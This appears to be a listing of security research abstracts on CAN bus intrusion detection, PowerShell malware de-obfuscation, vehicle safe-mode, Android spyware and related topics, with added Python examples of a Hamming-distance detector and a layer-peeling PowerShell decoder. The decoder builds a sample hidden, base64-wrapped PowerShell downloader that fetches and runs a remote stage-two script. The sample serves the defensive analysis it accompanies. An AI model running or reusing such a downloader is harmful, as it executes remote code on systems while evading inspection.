Detecting attacks to internal vehicle networks through Hamming distance
Analysis of in-vehicle networks is an open research area that gained relevance after recent reports of cyber attacks against connected vehicles. After those attacks gained international media attention, many security researchers started to propose algorithms that model the normal behaviour of the CAN bus in order to detect the injection of malicious messages.
However, although the automotive domain has different constraints from classical IT security, much of this research has applied sophisticated algorithms taken from IT anomaly detection, proposing solutions that cannot run on current Electronic Control Units (ECUs).
This paper proposes a novel intrusion detection algorithm that aims to identify malicious CAN messages injected by attackers into the CAN bus of modern vehicles. The algorithm has been designed and implemented under the very strict constraints of low-end ECUs, with low computational complexity and a small memory footprint.
The proposed algorithm identifies anomalies in the sequence of payloads of different classes of IDs by computing the Hamming distance between consecutive payloads. Its detection performance is evaluated through experiments carried out on real CAN traffic gathered from an unmodified licensed vehicle.
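The per-ID Hamming-distance idea sketched in the abstract, as an added Python example that is not the paper's reference implementation: each CAN ID keeps only its last accepted payload and the [min, max] envelope of the Hamming distance between consecutive payloads learned from a clean training window, and a frame outside that envelope is flagged. The training traffic, the counter/sensor layout of ID 0x1A0 and the attack frames are all constructed for the example; the choice not to store a flagged payload as the new reference is an assumption, not something the paper specifies.

```python
"""Per-ID Hamming-distance detector for CAN payloads (added example, not the paper's code).

Each CAN ID gets a tiny model: the last accepted payload and the (min, max) range of the
Hamming distance between consecutive payloads observed during clean training traffic.
A frame whose distance to its predecessor falls outside that range is flagged.
The training traffic and attack frames are constructed here; the counter/sensor
layout of ID 0x1A0 is an assumption for the example, not a real vehicle's signal map.
"""


def hamming(a: bytes, b: bytes) -> int:
    """Number of differing bits between two payloads; a length change counts as maximal."""
    if len(a) != len(b):
        return 8 * max(len(a), len(b))
    return sum(bin(x ^ y).count("1") for x, y in zip(a, b))


class HammingDetector:
    """State per ID is one payload (<= 8 bytes) plus two small integers."""

    def __init__(self):
        self.last = {}    # can_id -> last accepted payload
        self.bounds = {}  # can_id -> (min_distance, max_distance) seen in training

    def train(self, frames):
        """Learn the per-ID distance envelope from trusted traffic."""
        for can_id, payload in frames:
            prev = self.last.get(can_id)
            if prev is not None:
                d = hamming(prev, payload)
                lo, hi = self.bounds.get(can_id, (d, d))
                self.bounds[can_id] = (min(lo, d), max(hi, d))
            self.last[can_id] = payload

    def check(self, can_id: int, payload: bytes) -> bool:
        """Return True if the frame is anomalous for this ID.

        Assumption made here: a flagged payload is not stored as the new reference,
        so the next legitimate frame is compared with the last good one.
        """
        prev = self.last.get(can_id)
        if prev is None or can_id not in self.bounds:
            self.last[can_id] = payload
            return False  # ID not modelled: nothing to compare against, pass through
        d = hamming(prev, payload)
        lo, hi = self.bounds[can_id]
        if lo <= d <= hi:
            self.last[can_id] = payload
            return False
        return True


def build_training_traffic(n: int = 200):
    """Constructed clean traffic: byte 0 is a 4-bit rolling counter, byte 1 a slow sensor."""
    frames = []
    for i in range(n):
        counter = i % 16
        sensor = (i // 4) & 0xFF
        frames.append((0x1A0, bytes([counter, sensor, 0, 0, 0, 0, 0, 0])))
    return frames


def run_demo():
    """Train on clean traffic, then check a legitimate frame, two attacks and another legitimate frame."""
    det = HammingDetector()
    det.train(build_training_traffic())
    legit_a = bytes([8, 50, 0, 0, 0, 0, 0, 0])  # continues the pattern (counter 7 -> 8)
    flood = bytes([0xFF] * 8)                    # injected all-ones payload: distance far above max
    replay = legit_a                             # identical replay: counter did not advance, distance 0
    legit_b = bytes([9, 50, 0, 0, 0, 0, 0, 0])  # next genuine frame, compared with legit_a
    return [det.check(0x1A0, p) for p in (legit_a, flood, replay, legit_b)]


if __name__ == "__main__":
    print(run_demo())  # [False, True, True, False]
```

The replay case is the interesting one: because the rolling counter always changes between genuine frames, the learned minimum distance is 1, so a byte-identical replayed payload (distance 0) is caught even though its content is perfectly plausible.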
Security in IoT pairing & authentication protocols, a threat model and a case study analysis
PowerDecode: a PowerShell Script Decoder Dedicated to Malware Analysis
In recent years, PowerShell-based attacks have been widely employed to compromise systems' security. Attackers can easily hide such malicious scripts in file formats (e.g., Office document macros) that can be delivered at scale via spam mail campaigns. Moreover, attackers employ obfuscation techniques that allow the PowerShell code to evade the most common anti-malware protections and perform unauthorized actions targeting the confidentiality, integrity and availability of an information system. In this paper, we present PowerDecode, an open-source module for the de-obfuscation and analysis of PowerShell scripts. In particular, this module receives a script as input and returns its obfuscated layers, its original de-obfuscated variant and a report about possible malicious activities. We tested PowerDecode on almost 3000 malicious scripts and the attained results showed significantly improved de-obfuscation performance in comparison to state-of-the-art systems. More specifically, PowerDecode was able to resolve multiple types of obfuscation and collect important information about attacks, such as malicious URLs and IP addresses contacted by malware. Finally, PowerDecode can be easily integrated into other malware analysis systems, and can represent a valuable aid in identifying malicious activities.
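The layer-peeling workflow the abstract describes (input script, obfuscated layers, de-obfuscated variant, indicators such as URLs and IP addresses), as an added Python example that is not PowerDecode's own code. It handles two common wrappers, `-EncodedCommand` (base64 of UTF-16LE) and `[Text.Encoding]::X.GetString([Convert]::FromBase64String(...))`, folds `'a'+'b'` string concatenation, and extracts URLs and IPv4 addresses from the innermost layer. The regexes, the `MAX_LAYERS` guard and the three-layer sample script (which points at a documentation-range address) are constructed for the example.

```python
"""Layered de-obfuscation of PowerShell scripts, in the spirit of PowerDecode.

Added illustration only; this is not PowerDecode's code. It peels two common
wrappers, folds string concatenation, and reports indicators from the innermost
layer. The sample script is constructed here and is not real malware.
"""
import base64
import re

MAX_LAYERS = 10  # guard against scripts that keep decoding into new wrappers

# -e / -ec / -enc / -EncodedCommand <base64 of UTF-16LE text>
ENC_CMD = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('...'))
GETSTRING_B64 = re.compile(
    r"\[(?:System\.)?Text\.Encoding\]::(\w+)\.GetString\("
    r"\[(?:System\.)?Convert\]::FromBase64String\(['\"]([A-Za-z0-9+/=]+)['\"]\)\)",
    re.I,
)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
URL = re.compile(r"https?://[^\s'\"<>()]+", re.I)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

# .NET encoding name (as written in the script) -> Python codec
_ENCODINGS = {"unicode": "utf-16-le", "utf8": "utf-8", "ascii": "ascii"}


def peel_layer(script: str):
    """Return the next inner layer, or None when no known wrapper is present."""
    m = ENC_CMD.search(script)
    if m:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    m = GETSTRING_B64.search(script)
    if m:
        codec = _ENCODINGS.get(m.group(1).lower(), "utf-8")
        return base64.b64decode(m.group(2)).decode(codec)
    return None


def fold_concatenations(script: str) -> str:
    """Repeatedly join 'a'+'b' into 'ab' until nothing changes."""
    while True:
        folded = CONCAT.sub(lambda m: "'" + m.group(1) + m.group(2) + "'", script)
        if folded == script:
            return folded
        script = folded


def decode(script: str) -> dict:
    """Peel wrappers layer by layer, then report the de-obfuscated script and its indicators."""
    layers = [script]
    while len(layers) <= MAX_LAYERS:
        inner = peel_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    final = fold_concatenations(layers[-1])
    return {
        "layers": layers,                        # outermost first, innermost last
        "deobfuscated": final,
        "urls": sorted(set(URL.findall(final))),
        "ips": sorted(set(IPV4.findall(final))),
    }


def build_sample() -> str:
    """Constructed three-layer sample: downloader, wrapped in base64, wrapped in -EncodedCommand."""
    inner = "$c=New-Object Net.WebClient;IEX $c.DownloadString('ht'+'tp://203.0.113.7/stage2.ps1')"
    b64_inner = base64.b64encode(inner.encode("utf-8")).decode()
    middle = f"IEX([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('{b64_inner}')))"
    b64_middle = base64.b64encode(middle.encode("utf-16-le")).decode()
    return f"powershell -nop -w hidden -EncodedCommand {b64_middle}"


if __name__ == "__main__":
    report = decode(build_sample())
    for i, layer in enumerate(report["layers"]):
        print(f"layer {i}: {layer[:72]}...")
    print("deobfuscated:", report["deobfuscated"])
    print("urls:", report["urls"], "ips:", report["ips"])
```

Real samples add many more tricks (tick and caret insertion, `-replace` chains, `[char]` arithmetic, reflection), which is why a tool like PowerDecode tracks each layer separately: the innermost layer is where the indicators live, but the outer layers are what the anti-malware engine actually saw.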
Evaluating Tangle Distributed Ledger for Access Control Policy Distribution in Multi-region Cloud Environments
Placing FaaS in the Fog, securely
Placing FaaS applications onto Fog infrastructures is an open problem presenting various challenges. It requires considering hardware and software requirements of single functions as well as Quality of Service requirements of the overall application. In this article, we propose a declarative methodology to address the placement of FaaS applications onto Fog infrastructures, supported by a running prototype. Our methodology considers hardware and software requirements, and latency constraints on function-function and function-service interactions. Particular attention is given to information flow security constraints and trust relations among the involved stakeholders, which are used to rank eligible output placements. A lifelike motivating example from augmented reality is used to showcase the prototype.
Scalable architecture for online prioritization of cyber threats
This paper proposes an innovative framework for the early detection of several cyber attacks, whose main component is an analytics core that gathers streams of raw data generated by network probes, builds several layer models representing different activities of internal hosts, and analyzes intra-layer and inter-layer information. The online analysis of internal network activities at different levels distinguishes our approach from most detection tools and algorithms, which focus on separate network levels or on interactions between internal and external hosts. Moreover, the integrated multi-layer analysis carried out through parallel processing reduces false positives and guarantees scalability with respect to the size of the network and the number of layers. As a further contribution, the proposed framework executes autonomous triage by assigning a risk score to each internal host. This key feature allows security experts to focus their attention on the few hosts with the highest scores rather than wasting time on thousands of daily alerts and false alarms.
Vehicle Safe-Mode, Limp-Mode in the Service of Cyber Security
This paper describes a concept for a vehicle safe-mode that may help reduce the potential damage of an identified cyber-attack. Unlike other defense mechanisms, which try to block the attack or simply notify of its existence, our mechanism responds to the detected breach by limiting the vehicle's functionality to relatively safe operations, and optionally activating additional security counter-measures. This is done by adopting the already existing mechanism of Limp-mode, which was originally designed to limit the potential damage of either a mechanical or an electrical malfunction and let the vehicle "limp back home" in relative safety. We further introduce two modes of safe-mode operation: in Transparent-mode, when a cyber-attack is detected the vehicle enters its pre-configured Limp-mode; in Extended-mode we suggest using custom messages that offer additional flexibility to both the reaction and the recovery plans. While Extended-mode requires modifications to the participating ECUs, Transparent-mode may be applicable to existing vehicles since it does not require any changes in the vehicle's systems; in other words, it may even be deployed as an external component connected through the OBD-II port. We suggest an architectural design for the given modes, and include guidelines for a safe-mode manager, its clients, possible reactions, and recovery plans. We note that our system can rely upon any deployed anomaly-detection system to identify the potential attack.
A Data-driven Characterization of Modern Android Spyware
According to Nokia's 2017 Threat Intelligence Report, 68.5% of malware targets the Android platform; Windows is second with 28%, followed by iOS and other platforms with 3.5%. The Android spyware family UAPUSH was responsible for the most infections, and several of the top 20 most common Android malware were spyware. Simply put, modern spyware steals the basic information needed to fuel more damaging attacks such as ransomware and banking fraud. Not surprisingly, some forms of spyware are also classified as banking trojans (e.g., ACECARD). We present a data-driven characterization of the principal factors that distinguish modern Android spyware (July 2016–July 2017) both from goodware and from other Android malware, using both traditional and deep ML. First, we propose an Ensemble Late Fusion (ELF) architecture that combines the predicted probabilities of multiple classifiers to generate a final prediction. We show that ELF outperforms several of the best-known traditional and deep learning classifiers. Second, we automatically identify key features that distinguish spyware both from goodware and from other malware. Finally, we present a detailed analysis of the factors distinguishing five important families of Android spyware: UAPUSH, PINCER, HEHE, USBCLEAVER, and ACECARD (the last is a hybrid spyware-banking trojan).
A time-series classification approach to shallow web traffic de-anonymization
Web traffic analysis and classification have been extensively studied, both with classical and deep learning techniques. Many of these systems analyze the entire packet to perform the classification task. Due to the increase in encrypted traffic in recent years, this approach has become problematic. Moreover, few works focus on the classification of the users themselves, also called web traffic de-anonymization. In the present paper we address this problem by proposing an approach focused on a shallow, temporal analysis of web traffic data packets. We show that it is possible to identify the users of a network just by analyzing their navigation patterns and without accessing the content of the TCP packets. Finally, we compare the performance of our approach with a more classical feed-forward neural network architecture to showcase the informational power of temporal data in this context.
